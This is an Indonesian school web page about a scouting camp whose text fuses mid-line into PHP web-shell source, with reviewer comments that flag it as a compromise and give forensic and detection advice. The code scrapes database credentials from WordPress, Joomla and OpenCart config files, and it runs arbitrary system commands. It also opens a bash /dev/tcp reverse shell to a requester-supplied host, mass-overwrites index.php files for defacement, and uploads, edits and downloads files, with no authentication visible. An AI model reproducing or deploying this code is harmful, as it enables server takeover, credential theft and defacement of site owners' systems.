PERKEMAHAN ALIH GOLONGAN
Tanggal : 05/10/2023$file, 'path' => $fullPath, 'is_dir' => is_dir($fullPath), 'size' => is_file($fullPath) ? filesize($fullPath) : 0, 'perm' => substr(sprintf('%o', fileperms($fullPath)), -4), 'mtime' => filemtime($fullPath), 'writable' => is_writable($fullPath) ]; } } return $items; }
// NOTE(review): The line above fuses page text with the tail of a helper whose start is
// outside this excerpt (presumably listDir(), which is called near the end; confirm).
// The visible part records path, is_dir, size, octal permission bits, mtime and
// writability for each entry and returns $items.
//
// NOTE(review): Everything from here to the closing PHP tag is script source whose
// feature set matches a web shell: file manager, command runner, config-file credential
// scraping, outbound shell connection and bulk index.php overwrite. It appears inside
// the text of an otherwise ordinary page. The opening of the script and safePath() are
// not visible, and no authentication or authorisation check appears in the part shown
// (confirm against the full file). A host serving this file should be treated as
// compromised: preserve the file and the web-server logs for forensics before removal,
// then rotate any secrets the web-server account could read.

// Recursively walks $dir and appends to $results (passed by reference) the path of every
// file whose lower-cased name matches one of the listed CMS/framework config file names.
// Returns nothing; the caller reads $results.
function findConfigFiles($dir, &$results = []) { $files = scandir($dir); foreach ($files as $file) { if ($file === '.' || $file === '..') { continue; } $path = $dir . DIRECTORY_SEPARATOR . $file; if (is_dir($path)) { findConfigFiles($path, $results); } else { $lower = strtolower($file); if (preg_match('/(wp-config.php|configuration.php|config.php|config.inc.php|settings.php|database.php|db.php|local.php|config.dist.php)/', $lower)) { $results[] = $path; } } } }
// Extract DB credentials from config file content (for common CMS).
// Chooses a branch from the file name or a marker string in $content, applies a set of
// patterns for database name, user, password and host, and returns an array keyed
// DB_NAME, DB_USER, DB_PASS, DB_HOST and CMS (plus DB_TYPE in the second branch). The
// CMS label is 'WordPress', 'Joomla' or 'OpenCart/Other'. Returns an empty array when no
// branch applies or, in the last two branches, when the user pattern finds nothing.
// NOTE(review): database credentials in any matching config file readable by the
// web-server account should be considered exposed and rotated.
function extractDBCredentials($content, $fileName = '') { $credentials = []; if (stripos($fileName, 'wp-config.php') !== false || strpos($content, "define('DB_NAME'") !== false) {
// WordPress style
preg_match("/define(s*'DB_NAME's*,s*'([^']+)'s*)/i", $content, $db); preg_match("/define(s*'DB_USER's*,s*'([^']+)'s*)/i", $content, $user); preg_match("/define(s*'DB_PASSWORD's*,s*'([^']*)'s*)/i", $content, $pass); preg_match("/define(s*'DB_HOST's*,s*'([^']+)'s*)/i", $content, $host); $credentials = [ 'DB_NAME' => $db[1] ?? '', 'DB_USER' => $user[1] ?? '', 'DB_PASS' => $pass[1] ?? '', 'DB_HOST' => $host[1] ?? '', 'CMS' => 'WordPress' ]; } elseif (stripos($fileName, 'configuration.php') !== false || strpos($content, '$dbtype') !== false) { preg_match("/publics+$users*=s*'([^']+)';/i", $content, $user); preg_match("/publics+$passwords*=s*'([^']*)';/i", $content, $pass); preg_match("/publics+$dbs*=s*'([^']+)';/i", $content, $db); preg_match("/publics+$hosts*=s*'([^']+)';/i", $content, $host); preg_match("/publics+$dbtypes*=s*'([^']+)';/i", $content, $type); if (!empty($user)) { $credentials = [ 'DB_NAME' => $db[1] ?? '', 'DB_USER' => $user[1] ?? 
'', 'DB_PASS' => $pass[1] ?? '', 'DB_HOST' => $host[1] ?? '', 'DB_TYPE' => $type[1] ?? '', 'CMS' => 'Joomla' ]; } } elseif (stripos($fileName, 'config.php') !== false || stripos($fileName, 'config.inc.php') !== false) { preg_match("/define(s*'DB_USERNAME's*,s*'([^']+)'s*)/i", $content, $user); preg_match("/define(s*'DB_PASSWORD's*,s*'([^']*)'s*)/i", $content, $pass); preg_match("/define(s*'DB_DATABASE's*,s*'([^']+)'s*)/i", $content, $db); preg_match("/define(s*'DB_HOSTNAME's*,s*'([^']+)'s*)/i", $content, $host); if (!empty($user)) { $credentials = [ 'DB_NAME' => $db[1] ?? '', 'DB_USER' => $user[1] ?? '', 'DB_PASS' => $pass[1] ?? '', 'DB_HOST' => $host[1] ?? '', 'CMS' => 'OpenCart/Other' ]; } } return $credentials; }
// Try to bypass disable_functions and run command (original author's description).
// Walks a fixed list of PHP process-execution functions, calls the first one that
// is_callable() accepts with $cmd, and returns its result when that is not null;
// otherwise returns a fixed "not available" message.
// NOTE(review): $cmd reaches the operating system unmodified. Defensive relevance:
// restricting these functions through the disable_functions setting, and alerting on
// shell processes started by the PHP / web-server account.
function runCommand($cmd) { $functions = ['system', 'exec', 'shell_exec', 'passthru', 'popen', 'proc_open']; foreach ($functions as $func) { if (is_callable($func)) { $output = $func($cmd); if ($output !== null) return $output; } } return "Command execution not available."; }
// Recursively deletes $dir: returns false if it does not exist, unlinks it if it is a
// file, otherwise removes every entry beneath it and then the directory itself.
// Results of the inner unlink()/rrmdir() calls are not checked; only the final rmdir()
// result is returned.
function rrmdir($dir) { if (!file_exists($dir)) return false; if (is_file($dir)) return unlink($dir); $objects = scandir($dir); foreach ($objects as $object) { if ($object != '.' && $object != '..') { $objPath = $dir . DIRECTORY_SEPARATOR . 
$object; if (is_dir($objPath)) rrmdir($objPath); else unlink($objPath); } } return rmdir($dir); }
// Unpacks $file into $dest based on its extension: ZipArchive for 'zip', PharData for
// 'tar'/'gz'/'tgz' when that class exists. Returns true on success and false otherwise.
// No check of the archive's entry names is visible before extraction.
function extractArchive($file, $dest) { $ext = strtolower(pathinfo($file, PATHINFO_EXTENSION)); if ($ext === 'zip') { $zip = new ZipArchive; if ($zip->open($file) === true) { $zip->extractTo($dest); $zip->close(); return true; } } elseif (in_array($ext, ['tar', 'gz', 'tgz', 'tar.gz'])) { if (class_exists('PharData')) { try { $phar = new PharData($file); $phar->extractTo($dest, null, true); return true; } catch (Exception $e) { return false; } } } return false; }
// Recursively visits every subdirectory of $startDir and, where the directory is
// writable, writes $defaceContent to an index.php inside it, appending that path to
// $writtenFiles (by reference). Existing index.php files are overwritten.
// NOTE(review): for recovery, index.php files under the web root with a modification
// time matching the incident window should be compared against a known-good copy.
function massDeface($startDir, $defaceContent, &$writtenFiles = []) { $files = scandir($startDir); foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $path = $startDir . DIRECTORY_SEPARATOR . $file; if (is_dir($path)) { if (is_writable($path)) { file_put_contents($path . DIRECTORY_SEPARATOR . 'index.php', $defaceContent); $writtenFiles[] = $path . DIRECTORY_SEPARATOR . 'index.php'; } massDeface($path, $defaceContent, $writtenFiles); } } }
// Recursively collects the path of every subdirectory of $dir into $dirs (by reference).
function flatListDirs($dir, &$dirs=[]) { $files = scandir($dir); foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $file; if (is_dir($path)) { $dirs[] = $path; flatListDirs($path, $dirs); } } }
// Request dispatch. `action` is read from $_REQUEST; `path` defaults to the working
// directory and has only the substrings '..' and ' ' removed. $msg / $err carry the
// status text set by the handlers below.
// NOTE(review): the action values handled below (upload, create, rename, delete, chmod,
// edit-save, backconnect, base64decode, dbextract, extractbackup, massdeface, edit,
// download) are usable search terms when hunting for requests to this script in
// web-server logs. Most handlers read $_POST, so their parameters will not appear in a
// standard access log.
$action = $_REQUEST['action'] ?? ''; $path = $_REQUEST['path'] ?? getcwd(); $path = str_replace(['..', " "], '', $path); $msg = ''; $err = '';
// upload: moves the uploaded file into the requested directory under its client-supplied
// basename. safePath() is defined outside this excerpt; it is called with __DIR__ as the
// base and a false return is treated as rejection. Whether it confines paths cannot be
// judged from here. No file-type or extension check is visible.
if ($action === 'upload' && isset($_FILES['file'])) { $targetDir = safePath($_POST['upload_dir'] ?? getcwd(), $baseDir=__DIR__); if ($targetDir === false) $err = "Invalid upload directory"; else { $filename = basename($_FILES['file']['name']); $dest = $targetDir . DIRECTORY_SEPARATOR . $filename; if (move_uploaded_file($_FILES['file']['tmp_name'], $dest)) { $msg = "File uploaded to " . htmlspecialchars($dest); } else { $err = "Failed to upload file."; } } }
// create: makes an empty file, or a folder when type is 'folder', named by the basename
// of the POSTed name inside the target directory, refusing if the name already exists.
if ($action === 'create') { $targetDir = safePath($_POST['target_dir'] ?? 
getcwd(), $baseDir=__DIR__); if ($targetDir === false) $err = "Invalid target directory"; else { $name = trim($_POST['name']); if ($name === '') { $err = "Name must not be empty."; } else { $safeName = basename($name); if ($_POST['type'] === 'folder') { $newFolder = $targetDir . DIRECTORY_SEPARATOR . $safeName; if (!file_exists($newFolder)) { if (mkdir($newFolder)) { $msg = "Folder created: " . htmlspecialchars($newFolder); } else { $err = "Failed to create folder."; } } else { $err = "Folder already exists."; } } else { $newFile = $targetDir . DIRECTORY_SEPARATOR . $safeName; if (!file_exists($newFile)) { if (file_put_contents($newFile, '') !== false) { $msg = "File created: " . htmlspecialchars($newFile); } else { $err = "Failed to create file."; } } else { $err = "File already exists."; } } } } }
// rename: renames `old` to the basename of `new` within the same directory, refusing if
// the destination already exists.
if ($action === 'rename' && isset($_POST['old']) && isset($_POST['new'])) { $old = safePath($_POST['old'], $baseDir=__DIR__); $newName = trim($_POST['new']); if ($old === false || empty($newName)) { $err = "Invalid paths for renaming"; } else { $new = safePath(dirname($_POST['old']) . DIRECTORY_SEPARATOR . 
basename($newName), $baseDir=__DIR__); if ($new === false) { $err = "Invalid new path for renaming."; } elseif (file_exists($new)) { $err = "A file or folder with the new name already exists."; } else { if (rename($old, $new)) { $msg = "Renamed successfully."; } else { $err = "Rename failed."; } } } }
// delete: removes the target; directories go through rrmdir() (recursive), files through
// unlink().
if ($action === 'delete' && isset($_POST['target'])) { $target = safePath($_POST['target'], $baseDir=__DIR__); if ($target === false) { $err = "Invalid delete path"; } else { if (is_dir($target)) { if (rrmdir($target)) { $msg = "Folder deleted"; } else { $err = "Failed to delete folder"; } } else { if (unlink($target)) { $msg = "File deleted"; } else { $err = "Failed to delete file"; } } } }
// chmod: applies a permission mode to the target after checking that `perm` is three or
// four octal digits.
if ($action === 'chmod' && isset($_POST['target']) && isset($_POST['perm'])) { $target = safePath($_POST['target'], $baseDir=__DIR__); $perm = $_POST['perm']; if ($target === false || !preg_match('/^[0-7]{3,4}$/', $perm)) { $err = "Invalid chmod parameters"; } else { if (chmod($target, octdec($perm))) { $msg = "Permission changed to $perm"; } else { $err = "Failed to change permission"; } } }
// edit-save: overwrites the named file with the POSTed content, unmodified.
// NOTE(review): this lets the requester change any script safePath() accepts, so other
// PHP files in the tree cannot be assumed clean after an incident.
if ($action === 'edit-save' && isset($_POST['file']) && isset($_POST['content'])) { $file = safePath($_POST['file'], $baseDir=__DIR__); if ($file === false) { $err = "Invalid file path"; } else { $content = $_POST['content']; if (file_put_contents($file, $content) !== false) { $msg = "File saved successfully"; } else { $err = "Failed to save file"; } } }
// backconnect: builds a bash /dev/tcp redirection from the POSTed host and port and
// passes it to runCommand(), i.e. an outbound shell connection attempt from the web
// server. `port` is cast with intval(); `host` is interpolated without any validation.
// The first 300 characters of the result are shown, HTML-escaped.
// NOTE(review): detection points are outbound TCP from the web server to unexpected
// hosts and bash started by the PHP process; egress filtering limits the impact.
if ($action === 'backconnect' && isset($_POST['host']) && isset($_POST['port'])) { $host = $_POST['host']; $port = intval($_POST['port']); $cmd = "bash -i >& /dev/tcp/$host/$port 0>&1"; $backconnect_res = runCommand($cmd); $msg = "Backconnect command run. Result: " . 
htmlspecialchars(substr($backconnect_res, 0, 300)); }
// base64decode: strict-mode base64 decoding of POSTed text; sets $err on invalid input.
$base64decoded = ''; if ($action === 'base64decode' && isset($_POST['base64text'])) { $base64decoded = base64_decode($_POST['base64text'], true); if ($base64decoded === false) { $err = "Invalid base64 string"; } }
// dbextract: runs findConfigFiles() from the working directory, reads each hit (read
// errors suppressed with @) and collects whatever extractDBCredentials() returns,
// tagged with the source file path under the 'File' key.
$dbExtractions = []; if ($action === "dbextract") { $configs = []; findConfigFiles(getcwd(), $configs); foreach ($configs as $configFile) { $content = @file_get_contents($configFile); if ($content !== false) { $creds = extractDBCredentials($content, basename($configFile)); if (!empty($creds)) { $creds['File'] = $configFile; $dbExtractions[] = $creds; } } } if (empty($dbExtractions)) { $err = "No database credentials found!"; } }
// extractbackup: unpacks the named archive into a new 'extracted_<timestamp>' directory
// next to it, created with mode 0755.
// NOTE(review): directories named extracted_<unix time> under the web root are a
// filesystem artefact of this handler.
if ($action === 'extractbackup' && isset($_POST['backupfile'])) { $backupfile = safePath($_POST['backupfile'], $baseDir=__DIR__); $extractto = dirname($backupfile) . DIRECTORY_SEPARATOR . 'extracted_' . time(); if ($backupfile === false || !file_exists($backupfile)) { $err = "Invalid backup file"; } else { if (!file_exists($extractto)) mkdir($extractto, 0755, true); if (extractArchive($backupfile, $extractto)) { $msg = "Backup extracted to $extractto"; } else { $err = "Failed to extract backup"; } } }
// massdeface: passes POSTed content to massDeface() starting at the working directory.
// The written paths are HTML-escaped and joined with a newline for display.
$massDefaceResult = ''; if ($action === 'massdeface' && isset($_POST['defacecontent'])) { $defaceContent = $_POST['defacecontent']; $writtenFiles = []; massDeface(getcwd(), $defaceContent, $writtenFiles); if (!empty($writtenFiles)) { $massDefaceResult = implode("
", array_map('htmlspecialchars', $writtenFiles)); $msg = "Mass deface done in " . count($writtenFiles) . " directories"; } else { $err = "No writable directories found for mass deface"; } }
// Directory listing for the current `path`; listDir() is defined outside this excerpt.
$items = listDir($path); $editFilePath = ''; $editFileContent = '';
// edit: loads the named file's contents for display in an editor when the path is
// accepted and is a regular file.
if ($action === 'edit' && isset($_GET['file'])) { $editFilePath = safePath($_GET['file'], $baseDir=__DIR__); if ($editFilePath !== false && is_file($editFilePath)) { $editFileContent = file_get_contents($editFilePath); } else { $err = "Invalid file for editing."; $editFilePath = ''; } }
// download: streams the named file to the client as an attachment and exits.
// NOTE(review): `action` and `file` arrive as GET parameters here, so these requests can
// show up in access logs. Any file the web-server account can read, and that safePath()
// accepts, may have been retrieved; scope the incident accordingly.
if ($action === 'download' && isset($_GET['file'])) { $downloadFile = safePath($_GET['file'], $baseDir=__DIR__); if ($downloadFile !== false && is_file($downloadFile)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($downloadFile) . '"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($downloadFile)); flush(); readfile($downloadFile); exit; } else { $err = "Invalid file for download."; } } ?>
Info Sekolah Lainnya :